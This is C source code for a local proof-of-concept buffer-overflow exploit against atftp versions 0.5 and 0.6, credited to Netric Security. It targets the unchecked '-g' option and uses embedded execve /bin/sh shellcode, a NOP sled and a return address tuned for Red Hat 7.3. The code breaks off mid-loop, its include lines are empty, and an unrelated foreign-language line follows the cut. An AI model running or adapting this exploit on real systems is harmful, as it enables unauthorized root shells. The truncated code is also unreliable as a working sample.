/* * atftp.0.5 * atftp.0.6 - local proof of concept exploit * exploits an unchecked buffer in the "get file" option "-g" * * return addr tested on redhat 7.3 - 0xbffffbcc * change for other systems - ./k3 * * Netric Security(RESOURCE MATERIAL) * http://www.netric.org * written by sacrine */ #include #include #include #include #define EGG 1024 #define BUFLEN (356+9) #define NOP 0x90 /* eSDee's execve /bin/sh shellcode */ char shellcode[] = "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx "\x50" // push %eax "\x53" // push %ebx "\x8d\x0c\x24" // lea (%esp,1),%ecx "\xb0\x0b" // mov $0xb,%al "\xcd\x80"; // int $0x80 int main(int argc, char **argv[]) { unsigned long ret = 0xbffffbcc; char buf[BUFLEN]; char egg[EGG]; int c; char *ptr; long *ptr2; int i=0; if(argc>1) { ret = ret - atol(argv[1]); } memset(buf,NOP,sizeof(buf)); ptr=egg; for (i=0; i<1024-strlen(shellcode)-1;i++)*(ptr++) = '\x90'; for (i=0; i

亚洲欧美在线